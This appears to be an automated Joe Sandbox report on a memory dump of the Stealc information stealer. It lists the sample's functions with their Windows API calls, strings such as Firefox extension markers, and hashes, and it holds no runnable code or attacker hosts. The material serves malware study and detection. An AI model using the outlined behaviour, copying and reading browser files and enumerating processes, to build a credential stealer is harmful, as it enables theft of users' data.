C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps, xrefs: 0077A0B2, 0077A0C6, 0077A0DC

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps
API String ID: 2929475105-3235701497
Opcode ID: a5d7e857d4f757e061429667c2d8e6bdc0ba5d8ae0ab163fd90e69c9f53915e0
Instruction ID: f84dd5a6e106d03227ebf42d9a74b634dbd2723c8f7ff639984ec6b2c93782a8
Opcode Fuzzy Hash: a5d7e857d4f757e061429667c2d8e6bdc0ba5d8ae0ab163fd90e69c9f53915e0
Instruction Fuzzy Hash: 8C4175F1929204FFDB05EFA4EE89AAD33B4B748311F144229F509932A1DB3C5944DB63

Function 00776BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@Jnw,@Jnw), ref: 00776C9F

Strings

Jnw, xrefs: 00776C1D, 00776C39, 00776C88, 00776C98, 00776C04, 00776C28, 00776C33
Jnw, xrefs: 00776BED, 00776C0D, 00776C8F
@Jnw, xrefs: 00776C80, 00776C83

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @Jnw$Jnw$Jnw
API String ID: 544645111-2813602956
Opcode ID: 8354e11fa50aea5a1bcce2566b32483a2cd9bba0a7f630ef1f374b81320c38f0
Instruction ID: 92201496d96acd6d6df0a9ed699ed6d47a35e4d809179b3112b6ef0aef75e1cb
Opcode Fuzzy Hash: 8354e11fa50aea5a1bcce2566b32483a2cd9bba0a7f630ef1f374b81320c38f0
Instruction Fuzzy Hash: 53210574A00608EFDB04CF89C584BAEBBF1FB48344F10C199D589AB345D739AA81DF90

Function 0077A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 00788B60: GetSystemTime.KERNEL32(?,00CF4C38,007905AE,?,?,?,?,?,?,?,?,?,00774963,?,00000014), ref: 00788B86

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0077A2E1
lstrlenA.KERNEL32(00000000,00000000), ref: 0077A3FF
lstrlenA.KERNEL32(00000000), ref: 0077A6BC

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 00779E10: memcmp.MSVCRT(?,v20,00000003), ref: 00779E2D

DeleteFileA.KERNEL32(00000000), ref: 0077A743

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: acf9c20fdc3a716a204f5beb66452fcfbec5968b6925f8a50e7be50e6a365a37
Instruction ID: 5d36471068a2cfcfb9438a815681d851424fdc37f92f141b32d1465bbf752741
Opcode Fuzzy Hash: acf9c20fdc3a716a204f5beb66452fcfbec5968b6925f8a50e7be50e6a365a37
Instruction Fuzzy Hash: C0E1E572850118EAEB05FBA4DD9ADEE7378AF54300F50816AF51672091EF3C7A49CB72

Function 0077D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 00788B60: GetSystemTime.KERNEL32(?,00CF4C38,007905AE,?,?,?,?,?,?,?,?,?,00774963,?,00000014), ref: 00788B86

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0077D801
lstrlenA.KERNEL32(00000000), ref: 0077D99F
lstrlenA.KERNEL32(00000000), ref: 0077D9B3
DeleteFileA.KERNEL32(00000000), ref: 0077DA32

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 4e9d73d7e3d4ddaef86a783bd2351213dbb743c43cd05a6cfb0137e4787782a4
Instruction ID: 422ee2d343ed7160fb8f904315f5d5a7cb8bc3a657b012bdf1fe3938836eda2a
Opcode Fuzzy Hash: 4e9d73d7e3d4ddaef86a783bd2351213dbb743c43cd05a6cfb0137e4787782a4
Instruction Fuzzy Hash: A4811271950108EBEF05FBA4DD9ADEE7378AF14300F50416AF506A6091EF3C6A09DB72

Function 0077F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 007799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007799EC
Part of subcall function 007799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00779A11
Part of subcall function 007799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00779A31
Part of subcall function 007799C0: ReadFile.KERNEL32(000000FF,?,00000000,007802E7,00000000), ref: 00779A5A
Part of subcall function 007799C0: LocalFree.KERNEL32(007802E7), ref: 00779A90
Part of subcall function 007799C0: CloseHandle.KERNEL32(000000FF), ref: 00779A9A

Part of subcall function 00788E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00788E52

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00791580,00790D92), ref: 0077F54C
lstrlenA.KERNEL32(00000000), ref: 0077F56B

Strings

moz-extension+++, xrefs: 0077F5AD
^userContextId=4294967295, xrefs: 0077F59C

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: cf1b18f705a585ac9d105fcd7f5d4b8635c6d972b6dadf5dd0ad220c79e6f1b1
Instruction ID: beb4bd1cf92282253da7351102e492c75f76edf082c418a6f30459ad1637f315
Opcode Fuzzy Hash: cf1b18f705a585ac9d105fcd7f5d4b8635c6d972b6dadf5dd0ad220c79e6f1b1
Instruction Fuzzy Hash: 1351F071D50108FAEF05FBA4DC9ADED7378AF54300F408529F816A7191EE3C6A19CBA2

Function 00788680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007905B7), ref: 007886CA
Process32First.KERNEL32(?,00000128), ref: 007886DE
Process32Next.KERNEL32(?,00000128), ref: 007886F3

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

CloseHandle.KERNEL32(?), ref: 00788761

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: a41a748dc4c70764af752c4756549065d587ff9f8b226566e71ec5254fccc2b3
Instruction ID: 63865b9e2a2fd30b41c0d649e90413000b7c4a04226df1e268b631b2115e3933
Opcode Fuzzy Hash: a41a748dc4c70764af752c4756549065d587ff9f8b226566e71ec5254fccc2b3
Instruction Fuzzy Hash: 0A318F71951218EBDB24EF91DC45FEEB778EB04700F1042AAE109A21A0DF386E45CFA2

Function 00784F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00784F7A
lstrcatA.KERNEL32(?,00791070), ref: 00784F97
lstrcatA.KERNEL32(?,00CFDA18), ref: 00784FAB
lstrcatA.KERNEL32(?,00791074), ref: 00784FBD

Part of subcall function 00784910: wsprintfA.USER32 ref: 0078492C
Part of subcall function 00784910: FindFirstFileA.KERNEL32(?,?), ref: 00784943

Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FDC), ref: 00784971
Part of subcall function 00784910: StrCmpCA.SHLWAPI(?,00790FE0), ref: 00784987
Part of subcall function 00784910: FindNextFileA.KERNEL32(000000FF,?), ref: 00784B7D
Part of subcall function 00784910: FindClose.KERNEL32(000000FF), ref: 00784B92

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: f1c051f188b2a0f639c439a5321dd6192891c3a50c5559a916e9435396a6b652
Instruction ID: 4dd55b4e534c70ef128fbac52e36736a29b090304bbb9faf898433ded39618cb
Opcode Fuzzy Hash: f1c051f188b2a0f639c439a5321dd6192891c3a50c5559a916e9435396a6b652
Instruction Fuzzy Hash: 6921DDB6954204ABCB54F770ED4AEED337CA754300F404694B64952181EEBDABC88BA3

Function 00786AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CF1620,?,0079110C,?,00000000,?,00791110,?,00000000,00790AEF), ref: 00786ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00786AE8
CloseHandle.KERNEL32(00000000), ref: 00786AF9
Sleep.KERNEL32(00001770), ref: 00786B04
CloseHandle.KERNEL32(?,00000000,?,00CF1620,?,0079110C,?,00000000,?,00791110,?,00000000,00790AEF), ref: 00786B1A
ExitProcess.KERNEL32 ref: 00786B22

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
